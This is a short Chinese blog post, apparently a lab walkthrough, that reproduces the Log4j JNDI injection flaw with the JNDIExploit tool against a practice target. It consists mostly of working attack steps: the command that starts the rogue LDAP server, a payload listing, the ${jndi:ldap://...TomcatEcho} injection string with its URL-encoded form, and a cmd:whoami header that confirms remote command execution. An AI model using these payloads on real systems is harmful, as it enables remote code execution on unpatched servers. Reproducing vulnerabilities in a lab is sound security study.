JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

1.首先搭建log4j靶场

2.开启服务

Windows攻击端执行以下命令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1

再开一个cmd可以看下能用什么payload

java -jar JNDIExploit-1.2-SNAPSHOT.jar -u

以上payload都可以尝试,我们使用

ldap://null:1389/TomcatBypass/TomcatEcho

3.构造请求

${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}

转成URL

%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D

4.开启bp

请求包中增加cmd:whoami

执行后发现命令可以执行

相关推荐
不吃香菜学java7 小时前
Redis的java客户端
java·开发语言·spring boot·redis·缓存
captain3767 小时前
事务___
java·数据库·mysql
北漂Zachary7 小时前
四大编程语言终极对比
android·java·php·laravel
小江的记录本8 小时前
【网络安全】《网络安全常见攻击与防御》(附:《六大攻击核心特性横向对比表》)
java·网络·人工智能·后端·python·安全·web安全
嗑嗑嗑瓜子的猫9 小时前
Java!它值得!
java·开发语言
醇氧9 小时前
【学习】软件过程模型全解析:从瀑布到敏捷的演进之路
学习·log4j
2401_8955213410 小时前
【Spring Security系列】Spring Security 过滤器详解与基于JDBC的认证实现
java·后端·spring
皮卡蛋炒饭.10 小时前
线程的概念和控制
java·开发语言·jvm
一只大袋鼠10 小时前
MyBatis 入门详细实战教程(一):从环境搭建到查询运行
java·开发语言·数据库·mysql·mybatis
程序员老邢10 小时前
【人生底稿・番外篇 05】我的电影江湖:从录像带时代,到港片陪伴的青春岁月
java·程序人生·职场发展·娱乐